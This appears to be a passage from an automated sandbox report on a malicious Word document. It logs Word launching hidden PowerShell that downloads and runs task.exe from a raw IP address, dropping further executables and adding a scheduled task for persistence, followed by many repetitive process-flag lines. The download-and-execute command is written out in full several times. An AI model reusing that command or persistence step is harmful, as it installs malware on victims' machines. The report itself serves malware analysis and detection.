                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Users\user\AppData\Roaming\task.exeFile created: C:\Users\user\AppData\Roaming\SzfukVRF.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\task.exeJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exeJump to dropped file

                    Boot Survival:

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOX
